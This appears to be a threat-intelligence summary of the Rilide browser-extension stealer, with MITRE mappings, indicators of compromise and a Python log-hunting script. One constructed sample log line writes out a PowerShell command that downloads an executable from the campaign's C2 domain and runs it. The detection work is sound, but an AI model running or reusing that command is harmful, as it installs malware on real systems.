Trustwave SpiderLabs uncovered Rilide, a new malware strain that hijacks Chromium-based browsers by disguising itself as a Google Drive extension and performing a wide range of actions such as monitoring history, taking screenshots, and injecting scripts to steal from cryptocurrency exchanges. The campaign features forged dialogs to fool users into revealing 2FA codes and allows background cryptocurrency withdrawals, with distribution through Ekipa RAT and Aurora Stealer campaigns and ties to a leaked source on an underground forum. #Rilide #EkipaRAT #AuroraStealer #GoogleDriveExtension #Chromium
Key points
- Rilide is a malicious Chrome/Chromium extension masquerading as a legitimate Google Drive extension.
- Capable of monitoring browsing history, taking screenshots, and injecting scripts to withdraw funds from cryptocurrency exchanges.
- Uses forged dialogs to deceive users into providing 2FA information, enabling background cryptocurrency withdrawals.
- Distributed via two campaigns: Ekipa RAT (Publisher document) and Aurora Stealer (ads abuse and mimicry of legitimate installers).
- Loader is Rust-based; downloads payloads, installs the extension, and can bypass some CSP protections to load external resources.
- Indicators of compromise include publisher files, Go/Rust loaders, and multiple domain/C2 references, plus wallet addresses.
MITRE Techniques
- [T1105] Ingress Tool Transfer – Download payload from a remote server and execute it. ‘Download payload from hxxps://nch-software[.]info/1/2[.]exe to %temp% directory as.txt’ and ‘Execute the payload.’
- [T1059.001] PowerShell – The loader is executed via a PowerShell process. ‘executed via start-process PowerShell cmdlet’
- [T1036] Masquerading – Rilide Stealer extension mimics benign Google Drive Extensions to blend in. ‘Rilide leverages a Rust loader used to install the extension … mimics benign Google Drive Extensions’
- [T1113] Screen Capture – The malware can capture and exfiltrate screenshots of active tabs on demand. ‘exfiltrates screenshots of the currently active tabs on demand’
- [T1555.003] Credentials from Web Browsers – The attack targets browser-stored credentials and wallet data in order to carry out cryptocurrency withdrawals. ‘designed to target data from multiple web browsers, cryptocurrency wallets, and local systems’
- [T1189] Drive-by Compromise – Abuse of Google Ads to spread the Aurora/related loaders. ‘abusing the Google Ads platform to spread the malware’
- [T1566.002] Phishing: Spearphishing Link – Phishing websites used to distribute Aurora and masquerade as legitimate installers. ‘Phishing Websites: Malware Aurora – nvidia-graphics[.]top’
Indicators of Compromise
- [File Name] Tes7777.pub – Context: Publisher file used in Ekipa RAT campaign; Hashes (example): SHA256 0e31ff6406b03982581246b7dd60f3b96edcf0bd007b31766954df001fd68f69, SHA1 e049f56198c23d86e9083142bfe80042e21d4b8e
- [File Name] PackageLauncher.exe – Context: Aurora Stealer payload; Hashes (example): SHA256 e623984143e0dc6e35c79869ab1521c6714e588e8e648606496f8372ca0d8416
- [File Name] 2.exe – Context: Rust-based loader for Rilide; Hash (example): SHA256 0f11aeecbde1f355d26c9d406dad80cb0ae8536aea31fdddaf915d4afd434f3f
- [File Name] waBp.exe – Context: Rilide loader; Hash (example): SHA256 8342b134cddeaf34ce05bafa9e860dacf6cd01b85fd00147d90a350516c055e5
- [Domain] nch-software[.]info – Context: C2 domain used in Ekipa RAT distribution
- [Domain] nvidia-graphics[.]top – Context: Phishing site domain used in Aurora campaign
- [Domain] ashgrrwt[.]click – Context: C2 domain referenced by Rilide loaders
- [Domain] vceilinichego[.]ru – Context: Additional Rilide loader C2 reference
- [Wallet Address] BTC – Context: Cryptocurrency wallets targeted by Rilide; example addresses: bc1qkczacyp5jq29s5kaphth4asu8cv2y4u4gdgj7q, bc1qsjg8dqx6ga30h6szjd8dv2wg50ch50qrey4t7j
- [Wallet Address] ETH – Context: Example Ethereum address used in campaigns; example: 0xDBc1330056E2F5e2FB11FB3C96dE2c44B313eA8d
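As an added illustration (not code from the Trustwave report), the following Python scans constructed log lines for the domain and SHA256 indicators listed above and for the download-to-%temp%-as-.txt-then-Start-Process chain noted under T1105/T1059.001; the PowerShell 4104 and Sysmon line formats used in the samples are simplified assumptions.

```python
import re

# Indicators copied from the IoC section above, kept defanged as listed there.
RILIDE_DOMAINS = {
    "nch-software[.]info", "nvidia-graphics[.]top",
    "ashgrrwt[.]click", "vceilinichego[.]ru",
}
RILIDE_SHA256 = {
    "0e31ff6406b03982581246b7dd60f3b96edcf0bd007b31766954df001fd68f69",
    "e623984143e0dc6e35c79869ab1521c6714e588e8e648606496f8372ca0d8416",
    "0f11aeecbde1f355d26c9d406dad80cb0ae8536aea31fdddaf915d4afd434f3f",
    "8342b134cddeaf34ce05bafa9e860dacf6cd01b85fd00147d90a350516c055e5",
}
# Behavioural chain from T1105/T1059.001 above: a PowerShell download cmdlet
# writing a .txt file under %temp%, plus Start-Process in the same command line.
DOWNLOAD_RE = re.compile(r"\b(Invoke-WebRequest|iwr|DownloadFile|Start-BitsTransfer)\b", re.I)
TEMP_TXT_RE = re.compile(r"(%temp%|\$env:temp)[^\s\"']*\.txt", re.I)
EXEC_RE = re.compile(r"\bStart-Process\b", re.I)
SHA256_RE = re.compile(r"\b[0-9a-f]{64}\b", re.I)

def refang(ioc: str) -> str:
    """Turn a defanged indicator back into the form that appears in real logs."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")

def classify_line(line: str) -> list[str]:
    """Return the Rilide-related findings for one log line (empty list if clean)."""
    findings = []
    lowered = line.lower()
    for dom in sorted(RILIDE_DOMAINS):
        if refang(dom) in lowered:
            findings.append(f"ioc_domain:{dom}")
    for digest in SHA256_RE.findall(line):
        if digest.lower() in RILIDE_SHA256:
            findings.append(f"ioc_sha256:{digest.lower()[:12]}")
    if DOWNLOAD_RE.search(line) and TEMP_TXT_RE.search(line) and EXEC_RE.search(line):
        findings.append("behaviour:temp_txt_download_then_start_process")
    return findings

def scan(lines: list[str]) -> dict[int, list[str]]:
    """Map the index of every suspicious line to its findings."""
    return {i: hits for i, line in enumerate(lines) if (hits := classify_line(line))}

# Constructed sample log lines (not from the report): a 4104 script block with the
# described chain, a clean 4104 baseline, and a Sysmon-style event with a known hash.
SAMPLE_LOGS = [
    "4104 ScriptBlock: Invoke-WebRequest https://nch-software.info/1/2.exe -OutFile $env:temp\\as.txt; Start-Process $env:temp\\as.txt",
    "4104 ScriptBlock: Get-ChildItem $env:temp | Measure-Object",
    "Sysmon 1: Image=C:\\Users\\u\\Downloads\\PackageLauncher.exe Hashes=SHA256=E623984143E0DC6E35C79869AB1521C6714E588E8E648606496F8372CA0D8416",
]
```

Running `scan(SAMPLE_LOGS)` flags lines 0 and 2 and leaves the baseline line untouched; swap in your own exported 4104/Sysmon lines to hunt retrospectively.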